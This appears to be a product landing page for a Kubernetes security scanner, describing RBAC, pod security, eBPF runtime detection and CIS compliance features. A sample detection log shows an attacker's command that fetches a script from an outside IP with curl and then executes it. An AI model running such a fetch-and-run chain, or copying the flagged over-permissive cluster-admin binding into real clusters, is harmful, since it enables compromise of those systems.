Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
RUNKubernetes Security

Your cluster is not as locked down as you think.

O3 continuously audits your Kubernetes cluster — RBAC policies, pod security, network policies, secrets management, and runtime behavior. Finds the gaps attackers use to move laterally and escalate privileges.

RBAC Blast Radius

A wildcard ClusterRole is all an attacker needs. We find them first.

O3 maps every ClusterRole, Role, RoleBinding, and ClusterRoleBinding. Wildcard permissions, overly broad verbs, and direct bindings to the default service account are flagged with blast radius estimates.

ClusterRole with wildcard verbs mapped to all subjects
Default service account overpermission detected
Effective permission graph across all namespaces
Blast radius: what an attacker gains from this misconfiguration
O3 RBAC Audit — cluster: prod-us-east-1
Critical
Wildcard ClusterRole bound to default service account
CIS 5.1.3 · Blast radius: full cluster read/write
ClusterRoleBinding · rbac.authorization.k8s.io/v1
name: cluster-admin-binding
roleRef:
kind: ClusterRole
name: cluster-admin # wildcard all verbs
subjects:
- kind: ServiceAccount
name: default # every pod in ns
namespace: payments
Blast radius

Any pod in the payments namespace can read and write all secrets cluster-wide — including other namespaces.

Pod Security Audit

Privileged containers. Root access. hostPath mounts exposing the node.

O3 identifies privileged containers, hostPath mounts, containers running as root, and missing seccompProfile definitions — then prioritizes by exploitability, not just compliance checkbox.

Privileged containers with full node access flagged
Containers running as UID 0 surfaced
hostNetwork and hostPID exposure mapped
Missing PodDisruptionBudget and resource limits
O3 Pod Security — namespace: payments
3 issues
privileged: trueCRITICAL — full node access
runAsUser: 0HIGH — runs as root
hostPath: /etcHIGH — node filesystem access
resources: {}MEDIUM — no limits set

2 CRITICAL · 1 HIGH · 1 MEDIUM · Remediation YAML available

Runtime Detection (eBPF)

Config says one thing. Runtime behavior tells the truth.

O3 deploys a lightweight eBPF sensor that baselines normal process execution, network connections, and syscall patterns per workload — then alerts when behavior deviates, without kernel modules or privileged access.

Process tree anomalies detected in real time
Unexpected outbound connections from any pod
Syscall pattern deviation surfaced
Zero kernel module required — eBPF only
O3 eBPF Runtime Monitor — pod: payments-6d9c4f-xvr2p
Anomaly
Baseline
Processes: node, npm
Connections: db:5432, redis:6379
Syscalls: read, write, connect
Anomaly
New process: /bin/bash (parent: node) — never in baseline
14:32:01bash → curl https://185.220.101.47/payload.sh — NEW OUTBOUND DEST
14:32:03bash → chmod +x /tmp/payload.sh — EXEC PERMISSION CHANGE
14:32:05bash → /tmp/payload.sh — UNKNOWN BINARY EXEC

Lateral movement detected — container likely compromised. Recommend: isolate pod immediately.

CIS Benchmark Compliance

Every CIS control. Pass or fail. With remediation attached.

Every finding is mapped to the CIS Kubernetes Benchmark. Reports include pass/fail status per control, evidence, and a remediation command or YAML patch — ready for auditors and engineers alike.

CIS Kubernetes Benchmark v1.8 full coverage
Pass/fail with evidence per control
Remediation YAML or kubectl command per finding
Exportable for SOC 2 and ISO 27001 audits
O3 CIS K8s Benchmark — cluster: prod-us-east-1
14 failing
87
Pass
14
Fail
86.1%
Score
CIS 1.2.1API server anonymous auth disabled
PASS
CIS 4.2.1Pod Security Admission configured
No PSA labels on 3 namespaces
FAIL
CIS 5.1.3Minimize wildcard use in RBAC
2 ClusterRoles with wildcards
FAIL
CIS 5.2.2Minimize privileged containers
4 pods privileged
FAIL
CIS 5.4.1Prefer Secrets not env vars
7 secrets exposed as env
FAIL

Report exported: CIS_K8s_prod-us-east-1_2026-05-27.pdf — SOC 2 ready

Kubernetes security that runs at runtime.

Deploy O3 into your cluster in minutes. Full workload visibility, zero agents required.

FAQ

Questions,
answered.

Everything teams ask before rolling this out. Still stuck? Reach our team.

  • O3 detects RBAC misconfigurations including wildcard permissions and over-permissive ClusterRoleBindings, pod security issues like privileged containers and hostPath mounts, network policy gaps, secrets management weaknesses such as unencrypted etcd or secrets mounted as environment variables, and runtime anomalies via eBPF-based behavioral monitoring.
  • For static configuration analysis. RBAC, pod specs, network policies. O3 works via read-only kubeconfig access with no in-cluster components required. For runtime anomaly detection, O3 deploys a lightweight eBPF sensor as a DaemonSet that requires no kernel module installation and has minimal performance overhead.
  • Yes. Every finding is mapped to the CIS Kubernetes Benchmark control it relates to, with pass/fail status, evidence, and remediation steps including the exact kubectl command or YAML patch needed to resolve it. Reports are formatted for both engineers and compliance auditors.
  • O3 combines static RBAC analysis, which maps what each service account and pod can access, with runtime eBPF monitoring that baselines normal process execution and network connections. When a workload makes an unexpected API server call, connects to a new internal service, or spawns an unusual process, O3 raises an alert tied to the specific workload and namespace.
  • For each RBAC misconfiguration, O3 calculates the blast radius: what resources an attacker could access if they compromised a workload with those permissions, which namespaces they could move into, what secrets they could read, and what escalation paths exist. This turns a raw misconfiguration into a prioritized risk with a concrete attack narrative.